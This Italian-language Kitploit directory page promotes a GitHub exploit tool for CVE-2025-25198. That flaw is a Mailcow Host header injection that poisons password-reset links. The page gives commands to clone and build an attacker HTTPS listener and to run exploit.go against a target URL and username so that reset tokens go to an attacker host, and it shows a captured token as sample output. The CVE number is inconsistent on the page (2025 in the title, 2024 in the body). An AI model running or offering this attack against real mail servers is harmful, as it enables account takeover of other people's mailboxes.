Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-25198 — Cattura i token di reset della password dagli attacchi di iniezione dell'header Host di Mailcow. | Kitploit
Strumenti/GitHubGitHub/enzocipher/cve-2025-25198
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubenzocipher/cve-2025-25198

CVE-2025-25198

Cattura i token di reset della password dagli attacchi di iniezione dell'header Host di Mailcow.

Vedi Repository
1211 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-25198

mailcow: dockerized è una suite open source di groupware/email basata su docker. Prima della versione 2025-01a, una vulnerabilità nella funzionalità di reset della password di mailcow consente a un attaccante di manipolare l'header Host HTTP per generare un link di reset della password che punta a un dominio controllato dall'attaccante. Questo può portare al takeover dell'account se un utente clicca sul link avvelenato.

Come funziona?

Configura un server https per ascoltare tutte le richieste e invia una richiesta POST al sito web con l'header Host contenente il tuo selezionato. Puoi anche usare Burpsuite per inviare la richiesta e ottenere il Token nel server.

Caratteristiche

  • Server HTTPS che recupera il Token di cambio password
  • Script di exploit che attacca la vulnerabilità del sito web.
  • Tutto sistemato e non richiede più openssl per funzionare

Prerequisiti

  • Go 1.16 o superiore

Script del Server

root@kitploit:~
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server

Script di Exploit

root@kitploit:~
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <[email protected]> --host <ip>:<port>  <--insecure | opzionale >

Dopo aver atteso un po', il server restituirà il token che puoi usare:

root@kitploit:~
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245
Scarica lo strumento